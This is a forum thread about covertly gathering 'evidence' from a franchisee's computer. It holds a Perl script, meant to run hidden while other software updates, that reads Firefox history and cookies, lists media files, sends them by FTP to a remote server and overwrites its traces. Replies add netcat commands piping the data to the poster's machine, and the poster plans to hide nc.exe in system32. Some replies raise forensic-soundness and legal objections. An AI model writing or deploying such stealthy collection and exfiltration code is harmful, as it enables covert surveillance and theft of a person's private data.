Remote Forensics

[Tedob1]

we have been told that an associate of ours has porn on his computer. not that i really care but if this came out it could be very harmful for the company i work for. the director asked me if i can get evidence of porn on his computer.

i found out he is running xp and uses firefox.

this script has been encapsulated to run on machines that do not have perl installed. perl2exe allows me to run this without opening a console and the bat file it calls also runs without one allowing a great deal of stealth to what im doing while im also updating the proprietory software on his box. he'll be sitting there watching as i work over PCAnywhere. i dont want him getting mad if he's not guilty but if he is guilty legal action will be taken. the department heads believe that the contract that he signed allows us to do this but a lawer is being consulted before i go ahead with it.


as you can see im a hack not a programmer and the programmers here will have a field day with this. my only response....it works! well at least on the 2k machine i made it on. ill test XP tomorrow.

my questions:

1) how do i delete the files that i create instead of just overwriting them, i tried using 'unlink' but it didn't do it. i can always just add an AT command to the batch file but that leads to my second question.

2) how would i use grep to list all the files and not shell to a batch file. it would be so much faster.

3)how can a get a directory listing of randomly named directories without using 'dir' in a 'for' command in the batch.

Code:

#!/usr/bin/perl
use Net::FTP;


####create batch to collect data####
open(FD, "+>>c:\\Xname\\LCinstall.bat") or die "can't open $FD $!";
print FD "cd \%USERPROFILE\%\n";
print FD "cd \"Application Data\"\\Mozilla\\Firefox\\Profiles\n";
print FD "for /F \"tokens=4 \" \%\%X in ('dir ^|find  \"DIR\" ') do type \%\%X\\history.dat \>c:\\Xname\\LCinstall.inf\n";
print FD "for /F \"tokens=4\" \%\%X in ('dir ^|find  \"DIR\" ') do type \%\%X\\cookies.txt \>\>c:\\Xname\\LCinstall.inf\n";
print FD "cd\\ \n";
print FD "dir /s *.jpg \>\>c:\\Xname\\LCinstall.inf\n";
print FD "dir /s *.avi \>\>c:\\Xname\\LCinstall.inf\n";
print FD "dir /s *.wmv \>\>c:\\Xname\\LCinstall.inf\n";

####run batch file####
system('c:\Xname\LCinstall.bat');

#### Info needed for server####
$hostname = 'xx.xxx.xx.xxx';
$username = 'name';
$password = 'password';
$home = "/somedir";
$filename = 'LCinstall.inf';
$Local = 'c:\Xname\LCinstall.inf';


####Begin FTP####
$ftp = Net::FTP->new($hostname) or die;          
$ftp->login($username, $password);       
$ftp->cwd($home),"\n";                   
$ftp->ascii(); 
$ftp->put ($Local, $filename); 
$ftp->quit;

####overwrite files####
open(FD, ">c:\\Xname\\LCinstall.bat") or die "can't open $FD $!";
print FD "run setup\n";
open(FD, ">c:\\Xname\\LCinstall.inf") or die "can't open $FD $!";
print FD "setup complete\n";

[rapier57]

If he is on your network, you may be better served to map his drive and perform the search that way. If you will be doing legal action, and you'll need to go to court, you will need to cause the least impact on his drive as possible, and preserve the state of the system. You will risk having your "evidence" tossed if you attempt to perform this in any way other than an approved, documented forensics process.

What is the incident response standard in your company?
BTW, if it is kiddie porn, just call the cops.

[Striek]

Rapier, mapping his drive to a network is NOT a forensic process. Any access to the drive will irrevocably alter its contents and render them unuseable. The proper method would be to take the drive and image it, however, this is not always feasible. Should this employee be terminated, the level of forensic evidence will not be held to the same standard it would be in a criminal case, as this would be a civil case. He only needs to convince a judge, and not beyond a shadow of doubt, but on a balance of probabilities. So gathering evidence in this manner from the drive should be sufficient for termination. Of course, if illegal materials *were* found, then additional steps would need to be taken.

/END ARROGANT BS

Tedob, rather than putting the dir statement directly within the for statement, see if you can put the dir statement at the beginning of the line, as in

dir | find DIR | xargs cat

or something like that. It may work better.

Now, as for deleting files, I am not quite sure of the problem. Why can you not simply issue a "del" command?

I would like to tackle the second question also, but I cannot understand it. I can't test this shell since I don't have PC Anywhere installed anywhere (no pun intended). I see you are piping the directory listings out to a the .inf file, but I don't quite understand what LCInstall.bat is supposed to do.

Hope I can help.

[Tedob1]

im not exactly sure who this person is yet (but i'll find out tomorrow)...he holds a franchise. i think its calif. and is not on our network i know what your saying about "touching" the files but im under the impression that we just need resonable suspicion to find him in breech of his contract and it is stated that we have full access to the info on his computer. our biz is remedial tutoring and some of it is inolved with the 'no child left behind' program which has become very competitive so i dont think a "court" case is in the picture but im not really sure. i guess our legal guys will know best...i just want to do the best i can to give them what they want in the amount of time i've been given ('bout a day).



Striek

here's how the bat file goes

cd %USERPROFILE%
cd "Application Data"\Mozilla\Firefox\Profiles

it then takes the forth word from each line of the dir output and uses it as the directory name to access history.dat and cookies.txt which are kept in these random named directories

for /F "tokens=4 " %%X in ('dir ^|find "DIR" ') do type %%X\history.dat >>LCinstall.inf
for /F "tokens=4" %%X in ('dir ^|find "DIR" ') do type %%X\cookies.txt >>LCinstall.inf

(the filenames are similar to those used by our software)


it then goes goes to c:\ and does dir /s *<the files extentions> to search the entire hard drive and redirects the whole kit and kaboodle to LCinstall.inf



i tried using 'system(del thefiles)' but it asked if i might need to declare 'del'. is del a command i can use in perl? if so with what mod?

[Striek]

I just thought of something.

You might want to use netcat instead of ftp'ing individual files. This may require placing netcat on the suspect computer, but it would eliminate the need to create batch files on the fly.

First, you would set up netcat to listen for the data coming from the suspect computer, with something like

nc -L -p 12345 &gt; evidence.txt

which tells netcat to listen on port 12345, and put whatever is sent through that port to evidence.txt. The -L is different from -l. -l will close the connection after the first transfer. -L is "listen harder" mode, which reopens the connection after each snippet of data is sent and appends it to the file you specified. Unfortuantely, the -L switch is only available on the windows version. I thought I had a version lying around for linux with the -L option, but I can't find it now...

You would need to put the listen command in a loop, like

while ( true ); do nc -l -p 12345 &gt; evidence.txt; done

Which will essentially copy the same thing.

Next, on the suspect computer, pipe the output of the dir and type commands through netcat, with something like.

print FD "'dir ^|find \"DIR\" ' | xargs type \%\%X\\history.dat \&gt; nc.exe &lt;your machine&gt; 12345";

This will send all that good info to your machine, where netcat will dump it to a text file. You can use the same method for directory listings. This will allow you to avoid shelling out to a batch file, as you put it.

I hope that's what you're looking for. It also eliminates creating the batch files in the first place, and the need to delete them.

<EDIT>
Instead of system(del), try exec(del)... the only functional difference is that exec() will halt execution of the script until the external program finishes. system() keeps the script running after the external app starts. Dunno... it may be worth a try.

And oops... used >'s when I should have used >>'s... take that into account or destroy your evidence!
</EDIT>

[Tedob1]

thanks shriek! although i'll only be ftp'ing one file i think using nc has some real potential and eliminates my file deletion problem ...well except for itself, but i can always give it an innocuous name and put it in system32

im confused though with the xargs bit though. DOS needs to use a double % in a batch file for a var. and type is a dos command...isn't it? (i know there is one in *nix but it doesn't do the same thing) wouldn't the two files need to be opened for reading and then piped to nc in perl? ...ah hell! i'll look into it in the morning instead of bugging you with petty questions, thanks for the idea!

[Striek]

Yeah... xargs wouldn't work, since you're running the script on the suspect machine, AFAIK.

Anyway, the xargs was to avoid putting the dir|find commands in a for loop, so ou could avoid using a batch file. We seem to have found a better solution, so the use of xargs is redundant. I would suggest something like:

print FD "for /F \"tokens=4 \" \%\%X in ('dir ^|find \"DIR\" ') do type \%\%X\\history.dat \| nc.exe &lt;yourbox&gt; 12345"

This should work. I can't think of a command for windows which would let you do this any other way, but check pstools by SysInternals, or maybe, the resource kit for XP might have something for you to do this. I'll look in to it more tomorrow. It'll be too late, but I want to make a script to do this anyway, too keep for later in case I get a situation like yours.

Glad I could help.

[hogfly]

Tedob,
If this could result in criminal litigation, you have already tainted the evidence. You should only ever do live forensics if you need to collect something running on the machine. If all you are looking for is evidence of porn, then get a written statement from your HR/Boss that gives you the authority to conduct a forensic investigation on that machine. Depending on your procedures you can go in at night and image the drive and still have a process that holds up. Honestly, if you find porn on that computer, you have to prove that he's the one that went and downloaded it. What if there was a virus on the machine that redirected his browser to a porn site?(you know as well as I do that they exist). Your company could end up in big trouble if you fired someone without proving they did it.

One suggestion I have is to start working with the forensic server project or Windows forensic toochest. Another suggestion I have is that your company invests in technology pathways prodiscover software. If you are going to be conducting regular investigations of this type, then you NEED something that will hold up under scrutiny.


I'm kind of curious why you are using a batch file within a perl script? Write the whole thing in perl.
look up the file::find module.

http://www.unix.org.ua/orelly/perl/sysadmin/ch02_04.htm

[querist]

With all due respect to Rapier57, I would not recommend calling the police unless you are REALLY sure about this. The mere accusation of something like that can cause irreparable damage to someone's reputation, career, and psyche.

I will also state that I detest child pornography and if this person is knowingly storing and/or distributing it then the full force of law should be used to punish that person for the crimes committed, but please be very careful before calling in the police.

[dinowuff]

I don't know if this matters or not but:

There may be a problem with

print FD "for /F \"tokens=4 \" \%\%X in ('dir ^|find \"DIR\" ') do type \%\%X\\history.dat \| nc.exe &lt;yourbox&gt; 12345"

As port 12345 was used by the netbus Trojan and most AV/Firewall client programs will at least notify the user of a possible issue when the PC starts sending out over this port.